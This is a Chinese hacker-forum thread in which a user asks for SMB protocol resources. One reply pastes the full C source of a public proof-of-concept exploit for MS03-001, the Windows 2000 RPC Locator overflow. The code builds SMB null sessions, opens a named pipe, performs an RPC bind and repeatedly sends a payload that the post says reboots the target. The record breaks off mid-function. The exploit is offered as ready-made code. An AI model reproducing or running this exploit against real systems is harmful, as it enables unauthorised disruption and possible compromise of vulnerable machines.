|
 | 作者: jnake [jnake]
 论坛用户 |
登录 |
| 老和尚写IPC$,我想写一下SMB,可是,手头资料有限,请大家慷慨解囊, 贡献一下SMB的资料! |
| 地主 发表时间: 05/05 16:03 |
 | 回复: ricky [ricky]  版主 |
登录 |
|
任重而道远啊,呵呵 |
| B1层 发表时间: 05/07 08:54 |
| 回复: jnake [jnake] 论坛用户 |
登录 |
|
没人有啊! |
| B2层 发表时间: 05/10 17:37 |
 | 回复: softlib [softlib]  论坛用户 |
登录 |
|
去 XFOCUS 看看。那里不少人都写过这样东西。资料很详细。 |
| B3层 发表时间: 05/16 17:29 |
| 回复: jnake [jnake] 论坛用户 |
登录 |
|
哦?softlib兄,我怎么找不到啊,有劳发一下连接! |
| B4层 发表时间: 05/16 21:10 |
 | 回复: fora [fora]  论坛用户 |
登录 |
|
闪空写了个“SMB的NTLM认证过程与NTLM挑战的编程实现”,还有一篇“SMB/CIFS BY THE ROOT”,应该有帮助吧。 没细看,先拿下来了。 顶楼的,你对SMB的资料收集的如何了,有设计的思路了吗? [此贴被 老挪(fora) 在 05月16日21时37分 编辑过] |
| B5层 发表时间: 05/16 21:23 |
| 回复: softlib [softlib] 论坛用户 |
登录 |
|
以后仔细翻翻资料再提问吧。现成的代码。 Windows 2000 Remote Procedure Call Locator Exploit 验证代码 原创:ilsy(isly) 来源:http://www.whitecell.org Author : ilsy Email : ilsy@whitecell.org HomePage: http://www.whitecell.org Date :2003-02-13 2003年1月22日,Microsoft发布了一个安全公告http://www.microsoft.com/technet/security/bulletin/ms03-001.asp, 说明Remote Procedure Call (RPC) Locator服务存在远程溢出漏洞,2003年2月2日,http://www.immunitysec.com的 Dave Aitel发布了验证这一问题的Binary文件plonk,下面代码验证这一问题。 Tested under Windows 2000 sp2, sp3中文版,这个代码会引起目标计算机的重起。 //----File:NetBIOS.h----// #ifndef NETBIOS_H_ #define NETBIOS_H_ #define SMBMAGICVAL MAKELONG(MAKEWORD(0xFF, 'S'), MAKEWORD('M', 'B') ) #define NBT_ADDLEN 0x00 typedef unsigned long UTIME; // Negotiate Protocol structures typedef struct { USHORT BufferFormat; char * DialectName; }Dialects; // RPC structures typedef struct _RPCHeader { UCHAR VersionMaj; UCHAR VerisonMin; UCHAR Type; UCHAR Flags; ULONG Rep; USHORT Fraglength; USHORT Authlen; ULONG Callid; }RPC_HEADER, *PRPC_HEADER; typedef struct _RPC_Bind { USHORT Maxtsize; USHORT Maxrsize; ULONG Assocgid; ULONG Numelements; USHORT Contextid; UCHAR Numsyntaxes; UCHAR Reserved; UUID Abstract; ULONG AbstractVer; UUID Transfer; ULONG TransferVer; }RPC_BIND, *PRPC_BIND; typedef struct _RPC_Request { ULONG Hint; USHORT Contextid; USHORT Opera; }RPC_REQUEST, *PRPC_REQUEST; // Session Setup X structures typedef struct { UCHAR WordCount; // Count of parameter words = 10 UCHAR AndXCommand; // Secondary (X) command; 0xFF = none UCHAR AndXReserved; // Reserved (must be 0) USHORT AndXOffset; // Offset to next command WordCount USHORT MaxBufferSize; // Client maximum buffer size USHORT MaxMpxCount; // Actual maximum multiplexed pending requests USHORT VcNumber; // 0 = first (only), nonzero=additional VC number ULONG SessionKey; // Session key (valid iff VcNumber != 0) USHORT CaseInsensitivePasswordLength; USHORT CaseSensitivePasswordLength; ULONG Reserved; // Must be 0 ULONG Capabilities; // Client capabilities USHORT ByteCount; // Count of data bytes; min = 0 }SMB_SESSIONSETUPX, *PSMB_SESSIONSETUPX; // Open structures typedef struct { UCHAR WordCount; // Count of parameter words = 24 UCHAR AndXCommand; // Secondary command; 0xFF = None UCHAR AndXReserved; // Reserved (must be 0) USHORT AndXOffset; // Offset to next command WordCount UCHAR Reserved; // Reserved (must be 0) USHORT NameLength; // Length of Name[] in bytes ULONG Flags; // Create bit set: // 0x02 - Request an oplock // 0x04 - Request a batch oplock // 0x08 - Target of open must be directory ULONG RootDirectoryFid; // If non-zero, open is relative to this directory ACCESS_MASK DesiredAccess; // access desired LARGE_INTEGER AllocationSize; // Initial allocation size ULONG ExtFileAttributes; // File attributes ULONG ShareAccess; // Type of share access ULONG CreateDisposition; // Action to take if file exists or not ULONG CreateOptions; // Options to use if creating a file ULONG ImpersonationLevel; // Security QOS information UCHAR SecurityFlags; // Security tracking mode flags: // 0x1 - SECURITY_CONTEXT_TRACKING // 0x2 - SECURITY_EFFECTIVE_ONLY USHORT ByteCount; // Length of byte parameters }SMB_OPENX, *PSMB_OPENX; // Transaction structures typedef struct { UCHAR WordCount; // Count of parameter words; value = (14 + SetupCount) USHORT TotalParameterCount; // Total parameter bytes being sent USHORT TotalDataCount; // Total data bytes being sent USHORT MaxParameterCount; // Max parameter bytes to return USHORT MaxDataCount; // Max data bytes to return UCHAR MaxSetupCount; // Max setup words to return UCHAR Reserved; USHORT Flags; // Additional information: // bit 0 - also disconnect TID in TID // bit 1 - one-way transaction (no response) ULONG Timeout; USHORT Reserved2; USHORT ParameterCount; // Parameter bytes sent this buffer USHORT ParameterOffset; // Offset (from header start) to Parameters USHORT DataCount; // Data bytes sent this buffer USHORT DataOffset; // Offset (from header start) to data UCHAR SetupCount; // Count of setup words UCHAR Reserved3; // Reserved (pad above to word) }SMB_TRANSACTION, *PSMB_TRANSACTION; // Transaction data structures typedef struct { USHORT PipeFunc; USHORT FileID; USHORT ByteCount; }SMB_TRANDATA, *PSMB_TRANDATA; // Tree connect structures typedef struct { UCHAR WordCount; // Count of parameter words = 4 UCHAR AndXCommand; // Secondary (X) command; 0xFF = none UCHAR AndXReserved; // Reserved (must be 0) USHORT AndXOffset; // Offset to next command WordCount USHORT Flags; // Additional information // bit 0 set = disconnect Tid USHORT PasswordLength; // Length of Password[] USHORT ByteCount; // Count of data bytes; min = 3 }SMB_TREECONNECT, *PSMB_TREECONNECT; typedef struct { UCHAR WordCount; // Count of parameter words = 17 USHORT DialectIndex; // Index of selected dialect UCHAR SecurityMode; // Security mode: // bit 0: 0 = share, 1 = user // bit 1: 1 = encrypt passwords USHORT MaxMpxCount; // Max pending multiplexed requests USHORT MaxNumberVcs; // Max VCs between client and server ULONG MaxBufferSize; // Max transmit buffer size ULONG MaxRawSize; // Maximum raw buffer size ULONG SessionKey; // Unique token identifying this session ULONG Capabilities; // Server capabilities ULONG SystemTimeLow; // System (UTC) time of the server (low). ULONG SystemTimeHigh; // System (UTC) time of the server (high). USHORT ServerTimeZone; // Time zone of server (min from UTC) UCHAR EncryptionKeyLength; // Length of encryption key. USHORT ByteCount; // Count of data bytes }SMB_NEGOTIATEREPLY, *PSMB_NEGOTIATEREPLY; // NBT_NAME_HEADER structures typedef struct { USHORT ID; USHORT Flags; USHORT Questions; USHORT Answer; USHORT Authority; USHORT Additional; }NBT_NAME_HEADER; // NBT_NAME_ANSWER structures typedef struct { char Name_[34]; USHORT Type; USHORT Class; ULONG TTL; USHORT DataLen; UCHAR Number; char Name[16]; }NBT_NAME_ANSWER; // NBT_HEADER structures typedef struct { struct { u_char packetType; u_char packetFlags; u_short packetLen; } s; } NBT_HEADER, *PNBT_HEADER; // SMB_HEADER structures typedef struct { NBT_HEADER NBTHeader; ULONG Protocol; // Contains 0xFF,'SMB' UCHAR Command; // Command code ULONG Status; // 32-bit error code UCHAR Flags; // Flags USHORT Flags2; // More flags UCHAR Pad[12]; // Ensure this section is 12 bytes long USHORT Tid; // Tree identifier USHORT Pid; // Caller's process id USHORT Uid; // Unauthenticated user id USHORT Mid; // multiplex id } SMB_HEADER, *PSMB_HEADER; // UCHAR WordCount; // Count of parameter words // USHORT * ParameterWords; // The parameter words // USHORT ByteCount; // Count of bytes // UCHAR * Buffer; // The bytes // Netbios session request structures typedef struct { NBT_HEADER NBTHeader; char Black1; char szNetBiosName[32]; char Black2[2]; char szNullName[32]; char Black3; } NSR_HEADER; #define TYPE_SESSION_MESSAGE 0x00 #define TYPE_SESSION_REQUEST 0x81 #define TYPE_POSITIVE_SESSION_RESPONSE 0x82 #define TYPE_NEGATIVE_SESSION_RESPONSE 0x83 #define TYPE_RETARGET_SESSION_RESPONSE 0x84 #define TYPE_SESSION_KEEP_ALIVE 0x85 #define SMB_COM_CREATE_DIRECTORY 0x00 #define SMB_COM_DELETE_DIRECTORY 0x01 #define SMB_COM_OPEN 0x02 #define SMB_COM_CREATE 0x03 #define SMB_COM_CLOSE 0x04 #define SMB_COM_FLUSH 0x05 #define SMB_COM_DELETE 0x06 #define SMB_COM_RENAME 0x07 #define SMB_COM_QUERY_INFORMATION 0x08 #define SMB_COM_SET_INFORMATION 0x09 #define SMB_COM_READ 0x0A #define SMB_COM_WRITE 0x0B #define SMB_COM_LOCK_BYTE_RANGE 0x0C #define SMB_COM_UNLOCK_BYTE_RANGE 0x0D #define SMB_COM_CREATE_TEMPORARY 0x0E #define SMB_COM_CREATE_NEW 0x0F #define SMB_COM_CHECK_DIRECTORY 0x10 #define SMB_COM_PROCESS_EXIT 0x11 #define SMB_COM_SEEK 0x12 #define SMB_COM_LOCK_AND_READ 0x13 #define SMB_COM_WRITE_AND_UNLOCK 0x14 #define SMB_COM_READ_RAW 0x1A #define SMB_COM_READ_MPX 0x1B #define SMB_COM_READ_MPX_SECONDARY 0x1C #define SMB_COM_WRITE_RAW 0x1D #define SMB_COM_WRITE_MPX 0x1E #define SMB_COM_WRITE_COMPLETE 0x20 #define SMB_COM_SET_INFORMATION2 0x22 #define SMB_COM_QUERY_INFORMATION2 0x23 #define SMB_COM_LOCKING_ANDX 0x24 #define SMB_COM_TRANSACTION 0x25 #define SMB_COM_TRANSACTION_SECONDARY 0x26 #define SMB_COM_IOCTL 0x27 #define SMB_COM_IOCTL_SECONDARY 0x28 #define SMB_COM_COPY 0x29 #define SMB_COM_MOVE 0x2A #define SMB_COM_ECHO 0x2B #define SMB_COM_WRITE_AND_CLOSE 0x2C #define SMB_COM_OPEN_ANDX 0x2D #define SMB_COM_READ_ANDX 0x2E #define SMB_COM_WRITE_ANDX 0x2F #define SMB_COM_CLOSE_AND_TREE_DISC 0x31 #define SMB_COM_TRANSACTION2 0x32 #define SMB_COM_TRANSACTION2_SECONDARY 0x33 #define SMB_COM_FIND_CLOSE2 0x34 #define SMB_COM_FIND_NOTIFY_CLOSE 0x35 #define SMB_COM_TREE_CONNECT 0x70 #define SMB_COM_TREE_DISCONNECT 0x71 #define SMB_COM_NEGOTIATE 0x72 #define SMB_COM_SESSION_SETUP_ANDX 0x73 #define SMB_COM_LOGOFF_ANDX 0x74 #define SMB_COM_TREE_CONNECT_ANDX 0x75 #define SMB_COM_QUERY_INFORMATION_DISK 0x80 #define SMB_COM_SEARCH 0x81 #define SMB_COM_FIND 0x82 #define SMB_COM_FIND_UNIQUE 0x83 #define SMB_COM_NT_TRANSACT 0xA0 #define SMB_COM_NT_TRANSACT_SECONDARY 0xA1 #define SMB_COM_NT_CREATE_ANDX 0xA2 #define SMB_COM_NT_CANCEL 0xA4 #define SMB_COM_OPEN_PRINT_FILE 0xC0 #define SMB_COM_WRITE_PRINT_FILE 0xC1 #define SMB_COM_CLOSE_PRINT_FILE 0xC2 #define SMB_COM_GET_PRINT_QUEUE 0xC3 #define SMB_COM_READ_BULK 0xD8 #define SMB_COM_WRITE_BULK 0xD9 #define SMB_COM_WRITE_BULK_DATA 0xDA #define SMB_NONE 0xFF #define LANMANDIALECT_PCNETWORKPROGRAM10 "PC NETWORK PROGRAM 1.0" #define LANMANDIALECT_MICROSOFTNETWORKS103 "MICROSOFT NETWORKS 1.03" #define LANMANDIALECT_MICROSOFTNETWORKS30 "MICROSOFT NETWORKS 3.0" #define LANMANDIALECT_LANMAN10 "LANMAN1.0" #define LANMANDIALECT_LM12X002 "LM1.2X002" #define SAMBA "Samba" #define LANMANDIALECT_NTLM012 "NT LM 0.12" #define NTLANMAN_10 "NT LANMAN 1.0" #endif //----File:Rpce.cpp----// #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <rpcdce.h> #include "netbios.h" #define xmalloc(s) (char *)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s)) // 分配内存 #define xfree(p) (char *)HeapFree (GetProcessHeap(),0,(p)) // 释放内存 #define PORT 445 // NetBIOS端口 #pragma comment (lib,"ws2_32") #pragma comment (lib,"rpcrt4") int Make_NullSession(SOCKET csock); int Make_Connection(char *address,int port,int timeout); int Make_Negotiate(SOCKET csock); int Make_SessionSetupX(SOCKET csock); int Make_TreeConnect(SOCKET csock); int Make_OpenX(SOCKET csock); int Make_RpcBind(SOCKET csock); int Make_Shellcode(SOCKET csock); Dialects Dialectsm[] = { {2, "PC NETWORK PROGRAM 1.0"}, {2, "MICROSOFT NETWORKS 1.03"}, {2, "MICROSOFT NETWORKS 3.0"}, {2, "LANMAN1.0"}, {2, "LM1.2X002"}, {2, "Samba"}, {2, "NT LM 0.12"}, {2, "NT LANMAN 1.0"}, {0, NULL} }; USHORT User_ID; USHORT Tree_ID; USHORT Proc_ID; USHORT Mult_ID; USHORT File_ID; unsigned char szShellcode[800] = "\0"; unsigned char szShellhead[] = "\x16\x00\x00\x00\x00\x00\x00\x00\x16\x00\x00\x00"; unsigned int iNumber; int main(int argc, char * argv[]) { SOCKET csock; WSADATA WSAData; int iRet; if(argc<2) { printf("Usage: %s IP\n", argv[0]); return 1; } if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) { printf("WSAStartup failed.\n"); WSACleanup(); exit(1); } csock = Make_Connection(argv[1],PORT,10); if(csock<=0) { printf("connect error:[%d].\r\n",csock); return -3; } iRet = Make_NullSession(csock); if(iRet != 0) { printf("\n%s : Make NullSession failed.\n", argv[1]); WSACleanup(); exit(1); } iRet = Make_OpenX(csock); if(iRet != 0) { printf("\n%s : Open locator failed.\n", argv[1]); WSACleanup(); exit(1); } iRet = Make_RpcBind(csock); if(iRet != 0) { printf("\n%s : RPC bind failed.\n", argv[1]); WSACleanup(); exit(1); } for(iNumber = 0; iNumber < 20; iNumber++) Make_Shellcode(csock); closesocket(csock); WSACleanup(); return 0; } // 建立IPC空连接 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_NullSession(SOCKET csock) { int iRet; iRet = Make_Negotiate(csock); if(iRet != 0) { printf("Negotiate Protocol failed.\n"); closesocket(csock); WSACleanup(); return 1; } iRet = Make_SessionSetupX(csock); if(iRet != 0) { printf("Session setup failed.\n"); closesocket(csock); WSACleanup(); return 1; } iRet = Make_TreeConnect(csock); if(iRet != 0) { printf("Tree connect failed.\n"); closesocket(csock); WSACleanup(); return 1; } return 0; } // 建立TCP连接 // 输入: // char * address IP地址 // int port 端口 // int timeout 延时 // 输出: // 返回: // 成功 >0 // 错误 <=0 int Make_Connection(char *address,int port,int timeout) { struct sockaddr_in target; SOCKET s; int i; DWORD bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { closesocket(s); return -2; } target.sin_port = htons(port); bf = 1; ioctlsocket(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { closesocket(s); return -3; } if(i==0) { closesocket(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); if((bf!=0)||(i!=sizeof(int))) { closesocket(s); return -5; } ioctlsocket(s,FIONBIO,&bf); return s; } // SMB服务协商 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_Negotiate(SOCKET csock) { PSMB_HEADER SmbHeader; USHORT dwSize; USHORT dwSize1; USHORT dwSize2; PCHAR szBytes; PCHAR szBytes1; PCHAR szBytes2; int i; dwSize = sizeof(LANMANDIALECT_PCNETWORKPROGRAM10); dwSize += sizeof(LANMANDIALECT_MICROSOFTNETWORKS103); dwSize += sizeof(LANMANDIALECT_MICROSOFTNETWORKS30); dwSize += sizeof(LANMANDIALECT_LANMAN10); dwSize += sizeof(LANMANDIALECT_LM12X002); dwSize += sizeof(SAMBA); dwSize += sizeof(LANMANDIALECT_NTLM012); dwSize += sizeof(NTLANMAN_10); dwSize += 8; dwSize1 = sizeof(SMB_HEADER); dwSize2 = dwSize + dwSize1+3; SmbHeader = (SMB_HEADER *)xmalloc(dwSize1); if(!SmbHeader)return 1; SmbHeader->NBTHeader.s.packetType = 0; SmbHeader->NBTHeader.s.packetFlags = 0; SmbHeader->NBTHeader.s.packetLen = htons(dwSize2-4); SmbHeader->Protocol = SMBMAGICVAL; SmbHeader->Command = SMB_COM_NEGOTIATE; SmbHeader->Status = 0; SmbHeader->Flags = 0x08; SmbHeader->Flags2 = 0x01; SmbHeader->Pid = (USHORT)rand() & 0xFFFF; SmbHeader->Mid = (USHORT)rand() & 0xFFFF; szBytes = xmalloc(dwSize); szBytes1 = xmalloc(dwSize2); if(!szBytes || !szBytes1) { xfree(SmbHeader); return 1; } szBytes2 = szBytes; for(i=0; Dialectsm[i].DialectName != NULL; i++) { * szBytes = Dialectsm[i].BufferFormat; strcpy(szBytes +1, Dialectsm[i].DialectName); szBytes += strlen(Dialectsm[i].DialectName) + 2; } szBytes = szBytes2; memcpy(szBytes1, SmbHeader, dwSize1); szBytes1[dwSize1 + 1] = (char)0x81; memcpy(szBytes1 + dwSize1 + 3, szBytes, dwSize); i = send(csock, (char *)szBytes1, dwSize2, 0); if(i <= 0) { xfree(szBytes); xfree(szBytes1); xfree(SmbHeader); return 1; } memset(SmbHeader, 0, dwSize1); xfree(szBytes); szBytes = xmalloc(1024); if(!szBytes) { xfree(szBytes1); xfree(SmbHeader); return 1; } i = recv(csock, szBytes, 1024, 0); if(i <= 0) { xfree(szBytes); xfree(szBytes1); xfree(SmbHeader); return 1; } szBytes2 = (char *)SmbHeader; SmbHeader = (SMB_HEADER *)szBytes; if(SmbHeader->Status != 0) { SmbHeader = (SMB_HEADER *)szBytes2; xfree(SmbHeader); xfree(szBytes); xfree(szBytes1); return 1; } SmbHeader = (SMB_HEADER *)szBytes2; if(*(szBytes + sizeof(SMB_HEADER)) != 0x11) { xfree(szBytes); xfree(szBytes1); xfree(SmbHeader); return 1; } xfree(SmbHeader); xfree(szBytes1); xfree(szBytes); return 0; } // SMB会话建立 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_SessionSetupX(SOCKET csock) { PSMB_HEADER SmbHeader; PSMB_SESSIONSETUPX SmbSessionSetupX; PCHAR szBytes, szBytes1; PCHAR tmp; USHORT dwSize, dwSize1, dwSize2; UCHAR szDomain[] = "WORKGROUP"; UCHAR szLanman[] = "Unix\0Samba"; int i; dwSize1 = sizeof(SMB_HEADER); dwSize2 = sizeof(SMB_SESSIONSETUPX); dwSize = dwSize1 + dwSize2 + sizeof(szDomain) + sizeof(szLanman) + 2; SmbHeader = (SMB_HEADER *)xmalloc(dwSize1); SmbSessionSetupX = (SMB_SESSIONSETUPX *)xmalloc(dwSize2); szBytes = xmalloc(dwSize); if(!SmbHeader || !SmbSessionSetupX || !szBytes) return 1; SmbHeader->NBTHeader.s.packetFlags = 0; SmbHeader->NBTHeader.s.packetType = 0; SmbHeader->NBTHeader.s.packetLen = htons(dwSize - 4); SmbHeader->Protocol = SMBMAGICVAL; SmbHeader->Command = SMB_COM_SESSION_SETUP_ANDX; SmbHeader->Status = 0; SmbHeader->Flags = 0x08; SmbHeader->Flags2 = 0x01; SmbHeader->Pid = (USHORT)rand() & 0xFFFF; SmbHeader->Mid = (USHORT)rand() & 0xFFFF; SmbSessionSetupX->WordCount = 13; SmbSessionSetupX->AndXCommand = 0xFF; SmbSessionSetupX->AndXReserved = 0; SmbSessionSetupX->AndXOffset = 0; SmbSessionSetupX->MaxBufferSize = 65535; SmbSessionSetupX->MaxMpxCount = 2; SmbSessionSetupX->VcNumber = 1025; SmbSessionSetupX->SessionKey = 0; SmbSessionSetupX->CaseInsensitivePasswordLength = 1; SmbSessionSetupX->CaseSensitivePasswordLength = 0; SmbSessionSetupX->Reserved = 0; SmbSessionSetupX->Capabilities = 0; SmbSessionSetupX->ByteCount = sizeof(szDomain) + sizeof(szLanman) + 2; memcpy(szBytes, SmbHeader, dwSize1); memcpy(szBytes + dwSize1, SmbSessionSetupX, dwSize2); memcpy(szBytes + dwSize1 +2, "\0\0", 2); memcpy(szBytes + dwSize1 + dwSize2 + 2, szDomain, sizeof(szDomain)); memcpy(szBytes + dwSize1 + dwSize2 + sizeof(szDomain) + 2, szLanman, sizeof(szLanman)); i = send(csock, (char *)szBytes, dwSize, 0); if(i<0) { xfree(szBytes); xfree(SmbHeader); xfree(SmbSessionSetupX); return 1; } memset(SmbHeader, 0, dwSize1); szBytes1 = xmalloc(1024); if(!szBytes1) { xfree(SmbHeader); xfree(SmbSessionSetupX); xfree(szBytes); return 1; } i = recv(csock, szBytes1, 1024, 0); if(i <= 0) { xfree(SmbHeader); xfree(SmbSessionSetupX); xfree(szBytes); xfree(szBytes1); return 1; } tmp = (char *)SmbHeader; SmbHeader = (SMB_HEADER *)szBytes1; if(SmbHeader->Status != 0) { SmbHeader = (SMB_HEADER *)tmp; xfree(SmbHeader); xfree(SmbSessionSetupX); xfree(szBytes); xfree(szBytes1); return 1; } User_ID = SmbHeader->Uid; SmbHeader = (SMB_HEADER *)tmp; xfree(SmbHeader); xfree(SmbSessionSetupX); xfree(szBytes); xfree(szBytes1); return 0; } // SMB连接建立 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_TreeConnect(SOCKET csock) { PSMB_HEADER SmbHeader; PSMB_TREECONNECT SmbTreeconnect; PCHAR szBytes, szBytes1; PCHAR tmp; USHORT dwSize, dwSize1, dwSize2; char szFileName[] = "\0IPC$\0IPC"; int i; dwSize1 = sizeof(SMB_HEADER); dwSize2 = sizeof(SMB_TREECONNECT); dwSize = dwSize1 + dwSize2 + sizeof(szFileName); SmbHeader = (SMB_HEADER *)xmalloc(dwSize1); SmbTreeconnect = (SMB_TREECONNECT *)xmalloc(dwSize2); szBytes = xmalloc(dwSize); if(!SmbHeader || !SmbTreeconnect || !szBytes) return 1; SmbHeader->NBTHeader.s.packetFlags = 0; SmbHeader->NBTHeader.s.packetType = 0; SmbHeader->NBTHeader.s.packetLen = htons(dwSize - 4); SmbHeader->Protocol = SMBMAGICVAL; SmbHeader->Command = SMB_COM_TREE_CONNECT_ANDX; SmbHeader->Status = 0; SmbHeader->Flags = 0x18; SmbHeader->Flags2 = 0x2001; SmbHeader->Pid = (USHORT)rand() & 0xFFFF; SmbHeader->Uid = User_ID; SmbTreeconnect->WordCount = 4; SmbTreeconnect->AndXCommand = 0xFF; SmbTreeconnect->AndXReserved = 0; SmbTreeconnect->AndXOffset = 0; SmbTreeconnect->Flags = 0; SmbTreeconnect->PasswordLength = 1; SmbTreeconnect->ByteCount = sizeof(szFileName); memcpy(szBytes, SmbHeader, dwSize1); memcpy(szBytes + dwSize1, SmbTreeconnect, dwSize2); memcpy(szBytes + dwSize1 + dwSize2, szFileName, dwSize - dwSize1 - dwSize2); i = send(csock, (char *)szBytes, dwSize, 0); if(i<0) { xfree(szBytes); xfree(SmbHeader); xfree(SmbTreeconnect); return 1; } memset(SmbHeader, 0, dwSize1); szBytes1 = new char[512]; if(!szBytes1) { xfree(szBytes); xfree(SmbHeader); xfree(SmbTreeconnect); return 1; } i = recv(csock, szBytes1, 512, 0); if(i <= 0) { xfree(SmbHeader); xfree(SmbTreeconnect); xfree(szBytes); delete [] szBytes1; return 1; } tmp = (char *)SmbHeader; SmbHeader = (SMB_HEADER *)szBytes1; if(SmbHeader->Status != 0) { SmbHeader = (SMB_HEADER *)tmp; xfree(SmbHeader); xfree(SmbTreeconnect); xfree(szBytes); delete [] szBytes1; return 1; } User_ID = SmbHeader->Uid; Tree_ID = SmbHeader->Tid; Proc_ID = SmbHeader->Pid; Mult_ID = SmbHeader->Mid; SmbHeader = (SMB_HEADER *)tmp; xfree(SmbHeader); xfree(SmbTreeconnect); xfree(szBytes); delete [] szBytes1; return 0; } // 打开有名管道 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_OpenX(SOCKET csock) { PSMB_HEADER SmbHeader; PSMB_OPENX SmbOpenX; PCHAR szBytes, szBytes1; PCHAR tmp; USHORT dwSize, dwSize1, dwSize2; char szFileName[] = "\0\\\0l\0s\0a\0r\0p\0c\0\0\0"; int i; dwSize1 = sizeof(SMB_HEADER); dwSize2 = sizeof(SMB_OPENX); dwSize = dwSize1 + dwSize2 + sizeof(szFileName); SmbHeader = (SMB_HEADER *)xmalloc(dwSize1); SmbOpenX = (SMB_OPENX *)xmalloc(dwSize2); szBytes = xmalloc(dwSize); if(!SmbHeader || !SmbOpenX || !szBytes) return 1; SmbHeader->NBTHeader.s.packetFlags = 0; SmbHeader->NBTHeader.s.packetType = 0; SmbHeader->NBTHeader.s.packetLen = htons(dwSize - 4); SmbHeader->Protocol = SMBMAGICVAL; SmbHeader->Command = SMB_COM_NT_CREATE_ANDX; SmbHeader->Status = 0; SmbHeader->Pid = Proc_ID; SmbHeader->Uid = User_ID; SmbHeader->Tid = Tree_ID; SmbHeader->Mid = Mult_ID; SmbHeader->Flags = 8; SmbHeader->Flags2 = 49153; SmbOpenX->WordCount = 24; SmbOpenX->AndXCommand = 0xFF; SmbOpenX->AndXReserved = 0; SmbOpenX->AndXOffset = 0; SmbOpenX->NameLength = sizeof(szFileName) - 2; SmbOpenX->Flags = 0; SmbOpenX->DesiredAccess = 0x2019F; SmbOpenX->ShareAccess = 0x3; SmbOpenX->CreateDisposition = 0x1; SmbOpenX->ImpersonationLevel= 0x2; SmbOpenX->ByteCount = sizeof(szFileName); memcpy(szBytes, SmbHeader, dwSize1); memcpy(szBytes + dwSize1, SmbOpenX, dwSize2); memcpy(szBytes + dwSize1 + dwSize2, szFileName, sizeof(szFileName)); i = send(csock, (char *)szBytes, dwSize, 0); if(i<0) { xfree(szBytes); xfree(SmbHeader); xfree(SmbOpenX); return 1; } memset(SmbHeader, 0, dwSize1); szBytes1 = new char[512]; if(!szBytes1) { xfree(szBytes); xfree(SmbHeader); xfree(SmbOpenX); return 1; } i = recv(csock, szBytes1, 512, 0); if(i <= 0) { xfree(SmbHeader); xfree(SmbOpenX); xfree(szBytes); delete [] szBytes1; return 1; } tmp = (char *)SmbOpenX; SmbOpenX = (SMB_OPENX *)(szBytes1 + sizeof(SMB_HEADER)); File_ID = SmbOpenX->NameLength; SmbOpenX = (SMB_OPENX *)tmp; tmp = (char *)SmbHeader; SmbHeader = (SMB_HEADER *)szBytes1; if(SmbHeader->Status != 0) { SmbHeader = (SMB_HEADER *)tmp; xfree(SmbHeader); xfree(SmbOpenX); xfree(szBytes); delete [] szBytes1; return 1; } SmbHeader = (SMB_HEADER *)tmp; xfree(SmbHeader); xfree(SmbOpenX); xfree(szBytes); delete [] szBytes1; return 0; } // PRC绑定 // 输入: // SOCKET csock // 输出: // 返回: // 成功 =0 // 错误 !=0 int Make_RpcBind(SOCKET csock) { PSMB_HEADER SmbHeader; PSMB_TRANSACTION SmbTransaction; PRPC_HEADER RpcHeader; PRPC_BIND RpcBind; PSMB_TRANDATA SmbTrandata; PCHAR szBytes, szBytes1; PCHAR tmp; USHORT dwSize, dwSize1, dwSize2, dwSize3, dwSize4, dwSize5; char szFileName[] = "\0\\\0P\0I\0P\0E\0\\\0\0\0"; int i; dwSize1 = sizeof(SMB_HEADER); dwSize2 = sizeof(SMB_TRANSACTION); dwSize3 = sizeof(RPC_HEADER); dwSize4 = sizeof(RPC_BIND); dwSize5 = sizeof(SMB_TRANDATA); dwSize = dwSize1 + dwSize2 + sizeof(szFileName) + dwSize3 + dwSize4 + dwSize5; SmbHeader = (SMB_HEADER *)xmalloc(dwSize1); SmbTransaction = (SMB_TRANSACTION *)xmalloc(dwSize2); RpcHeader = (RPC_HEADER *)xmalloc(dwSize3); RpcBind = (RPC_BIND *)xmalloc(dwSize4); SmbTrandata = (SMB_TRANDATA *)xmalloc(dwSize5); szBytes = xmalloc(dwSize); if(!SmbHeader || !SmbTransaction || !SmbTrandata || !szBytes || !RpcHeader || !RpcBind) return 1; SmbHeader->NBTHeader.s.packetFlags = 0; SmbHeader->NBTHeader.s.packetType = 0; SmbHeader->NBTHeader.s.packetLen = htons(dwSize - 4); SmbHeader->Protocol = SMBMAGICVAL; SmbHeader->Command = SMB_COM_TRANSACTION; SmbHeader->Status = 0; SmbHeader->Pid = Proc_ID; SmbHeader->Uid = User_ID; SmbHeader->Tid = Tree_ID; SmbHeader->Mid = Mult_ID; SmbHeader->Flags = 8; SmbHeader->Flags2 = 49153; SmbTransaction->WordCount = 16; SmbTransaction->TotalDataCount = dwSize3 + dwSize4; SmbTransaction->MaxDataCount = dwSize3 + dwSize4; SmbTransaction->ParameterOffset = dwSize1 + dwSize2 + dwSize5 + sizeof(szFileName) - 4; SmbTransaction->DataCount = dwSize3 + dwSize4; SmbTransaction->DataOffset = dwSize1 + dwSize2 + dwSize5 + sizeof(szFileName) - 4; SmbTransaction->SetupCount = 0x2; SmbTrandata->PipeFunc = 0x26; SmbTrandata->FileID = File_ID; SmbTrandata->ByteCount = dwSize3 + dwSize4 + sizeof(szFileName); RpcHeader->VersionMaj = 0x5; RpcHeader->VerisonMin = 0; RpcHeader->Type = 0x0B; RpcHeader->Flags = 0x3; RpcHeader->Rep = 0x10; RpcHeader->Fraglength = dwSize3 + dwSize4; RpcHeader->Authlen = 0x0; RpcHeader->Callid = 0x0; RpcBind->Maxtsize = 0x16D0; RpcBind->Maxrsize = 0x16D0; RpcBind->Assocgid = 